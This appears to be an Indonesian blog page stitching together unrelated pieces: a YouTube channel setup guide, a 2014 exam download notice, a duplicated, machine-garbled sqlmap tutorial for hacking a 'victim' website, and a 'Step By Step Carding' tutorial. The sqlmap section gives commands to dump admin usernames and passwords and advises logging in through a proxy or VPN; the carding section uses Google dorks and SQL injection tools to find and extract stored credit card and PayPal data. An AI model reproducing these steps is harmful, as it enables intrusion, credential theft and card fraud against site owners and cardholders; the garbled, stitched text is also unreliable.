Panduan Membuat Channel Youtube Bagi Pemula



PANDUAN MEMBUAT CHANNEL YOUTUBE

  • Langkah pertama dalam membuat akun atau channel adalah dengan mengunjungi halaman Youtube terlebih dahulu.
  • Jika kamu sudah mengunjungi halaman yang dituju kemudian klik bagian ‘Sign In’ yang berada di pojok kanan atas layar.
  • Kemudian, masukkan email ke halaman Youtube tersebut. Pastikan email tersebut benar-benar aktif dan dibuat khusus untuk channel Youtube saja, sehingga tidak membingungkan aktivitas lainnya.
  • Setelah halaman Youtube berhasil dibuat, klik foto yang ada di pojok kanan atas dan klik bagian ‘Settings’. Dari sana kemudian muncul pengaturan akun dan kamu bisa memilih ‘Create a New Channel’ untuk membuat channel baru.
  • Setelah muncul pilihan ‘Create Channel’, kamu wajib mengisikan nama untuk channel tersebut. Sebaiknya gunakan nama yang sesuai dengan isi konten yang ada dan pilihlah nama yang mudah diingat dan tetap unik.
  • Bila kamu ingin menggunakan channel Youtube untuk bisnis, maka bisa klik tulisan ‘Use a Bussiness or Other Name’ yang berwarna biru. Kamu juga perlu memasukkan nama brand yang diinginkan saat masuk laman ‘Brand Account’ dan klik tombol ‘Create’.
  • Channel kamu pun sudah dibuat, dan selanjutnya kamu bisa mengisinya dengan cara mengunggah video yang sudah disiapkan.

Tips membuat channel kamu makin dikenal

Setelah kamu berhasil mencoba cara membuat channel Youtube tersebut, penting juga untuk memperhatikan beberapa tips berikut agar channelmu makin dikenal banyak orang. Apa saja? Yuk simak!
  • Buat judul menarik
Judul adalah hal terpenting untuk menjelaskan mengenai video di channel Youtube kamu. Selain judul juga terdapat deskripsi yang perlu kamu tuliskan. Rekomendasi dari Google menyarankan sebaiknya karakter di channel Youtube tidak lebih dari 1000 karakter. Dalam membuat deskripsi maupun judul sebaiknya gunakan kata-kata interaktif dan tidak membingungkan.
  • Gunakan Kata ‘Video’
Erick Freeman, seorang pakar dari The Search Agency menganjurkan dalam membuat judul di channel Youtube sebaiknya sematkan kata ‘video’. Meskipun hal ini terlihat sepele tetapi memberikan dampak yang sangat besar. Sebagian besar orang mencari konten di Youtube memasukkan kata ‘video’ dalam judul. Contohnya saja adalah ‘video tutorial kecantikan terkini’
  • Pakai keywords
Biasanya keywords banyak digunakan dalam menulis artikel agar mendapatkan peringkat teratas di halaman hasil pencarian Google. Ternyata, menggunakan keywords juga penting untuk diterapkan dalam membuat judul video channel Youtube kamu. Untuk mengetahui keywords yang paling sering digunakan, kamu bisa menggunakan tools seperti Google AdWords atau Wordtracker.

Semoga panduan dan cara membuat channel Youtube di atas dapat membantu kamu dalam mengembangkan bisnis dan keperluan promosi lainnya. Ingat, untuk menunjang bisnis online tidak sekadar promosi melalui channel Youtube.

Mencari banyak subscriber




Untuk semua yang mencari informasi lebih lanjut dan terupdate bisa klik link dibawah


Jangan lupa like and Subscribe

Download Kisi-kisi Ujian Nasional 2014 + Jawabannya.

Ujian Nasional (UN) tahun 2014 untuk jenjang SMK/MAK akan digelar pada 14 April 2014. Sedangkan UN untuk jenjang SMP/MTs dan SMPLB dijadwalkan tanggal 5 Mei 2014.
Untuk membantu para peserta Ujian Nasional tingkat SMA/MA sederajat kami sampaikan latihan soal UN SMA/MA yang bisa di download secara gratis!


Hack website using backtrack sqlmap

Dalam tutorial sebelumnya saya telah menjelaskan apa yang mundur , sekarang dalam tutorial ini saya akan menunjukkan kepada Anda cara hack website menggunakan Backtrack 5 (sqlmap). Sqlmap adalah sql injection otomatis alat yang membantu Anda untuk hack situs dengan mudah. Ikuti langkah-langkah sederhana untuk hack website menggunakan backtrack 5 alat sqlmap.

1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda sql map 1
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
sql map 2
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs

4. Sekarang Anda akan mendapatkan nama database website
sql map 3
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.

5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel

6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
sql map 4
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj.
sql map 5
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
sql map 7
Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dump
Sekarang kita punya username dan password dari website!
sql map 9
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin.

Hack website using backtrack sqlmap

Dalam tutorial sebelumnya saya telah menjelaskan apa yang mundur , sekarang dalam tutorial ini saya akan menunjukkan kepada Anda cara hack website menggunakan Backtrack 5 (sqlmap). Sqlmap adalah sql injection otomatis alat yang membantu Anda untuk hack situs dengan mudah. Ikuti langkah-langkah sederhana untuk hack website menggunakan backtrack 5 alat sqlmap.

1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda sql map 1
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
sql map 2
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs

4. Sekarang Anda akan mendapatkan nama database website
sql map 3
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.

5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel

6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
sql map 4
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj.
sql map 5
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
sql map 7
Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dump
Sekarang kita punya username dan password dari website!
sql map 9
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin.

Tutorial carding "Step By Step Carding"



Tutorial carding "Step By Step Carding"



Sebelumnya,,, saya mau tanya, apa sih definisi Carding itu..?? Nah, gini saja,,, menurut definisi versi saya, Carding adalah suatu kegiatan yang intinya yaitu mencuri data credit card orang lain agar bisa di gunakan untuk membobol system securitynya dan menguras uang'a sepuas'a... Wew, dari pengertiannya, udah keliatan kejam ya.. hehe... lanjut -->

 




Persiapan software :

1. GOOGLE URL EXTRACTOR
2. SQL Exploiter
(salah satu software ini terdapat virus tetapi tidak terlalu berbahaya dan saya tidak menyediakan link karena anda bisa mencari sendiri)

Kita mulai dari #Google Url Extractor

1. Buka Google Url Extractor.exe
2. Lalu masukkan dork "product.asp?id=" Jika kurang anda bisa Klik DiSini =>  http://pastebin.com/TtrVQhH7
3. Disini aku menggunakan product.asp?id= site:com
4. Terus scan, kalau sudah "found link" Remove duplicated

5. Lalu pindah ke tab SQL Injector query builder
6. Masukan argumen tanda tanya(?)di insert arguments here

 
7. if finish, click bulid and next you scan !
8. Terus pindah ke tab berikutnya Attack Victim
9. Cari yang result errornya :
"unclosed quotation mark before the character"

Langkah selanjutnya pemakaian SQL Exploiter
1. Buka Sqlnya
2. Terus langsung menuju TAB Attacker for Hackable !
3. Click add manually, dan paste hasil copy dari yang di attack victim (Google url extractor), dan hilang tanda '

 
 4. Next Clik Site info, tunggu hingga infonya keluar !
5. Kalau sudah keluar maka tinggal get tables
6. Nanti akan muncul table table web tersebut
7. kalau sudah, pilih salah satu table yang kira2 didalamnya terdapat CC atau Paypal, Dan biasanya table ini terdapat nama "Order" "buy"
8. Terus get column untuk mengetahui apa saja yang ada di table tersebut
9. Nanti kalau sudah semua, blok semua column langsung click get data

Video Tutorial 
http://www.ziddu.com/download/7809137/httpgratiswindows.wordpress.comcaraCar.zip.html
 

NB:
RESIKO DITANGGUNG ANDA SENDIRI DAN JANGAN MEMBAWA NAMA SAYA


=SEMOGS BERHASIL=



Author By :SUARDIANA